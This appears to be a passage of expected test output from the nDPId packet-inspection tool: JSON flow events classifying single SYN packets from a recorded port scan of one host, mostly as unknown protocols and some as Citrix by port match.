-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1614,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7627,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1614,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7627,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1858,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50636,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1858,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50636,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":370,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":44501,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":370,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":44501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":17877,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":17877,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":414,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":44501,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":414,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":44501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1773,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061105,"flow_last_seen":1278275061105,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1494,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Citrix","breed":"Acceptable","category":"Network"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1773,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061105,"flow_last_seen":1278275061105,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1494,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1021,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":13782,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1021,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":13782,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":17877,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":17877,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1836,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1494,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Citrix","breed":"Acceptable","category":"Network"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1836,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1494,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":13783,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":13783,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1084,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":13782,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1084,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":13782,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":13783,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":13783,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":688,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3546,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":688,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3546,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":759,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3546,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":759,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3546,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1488,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1500,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1488,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1561,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1500,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1561,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1501,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1316,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1501,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1316,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1482,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1503,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1482,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1503,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3551,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3551,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1567,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1503,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1567,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1503,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1304,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3551,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1304,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3551,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":65000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":65000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":65000,"l4_proto":"tcp","ndpi": 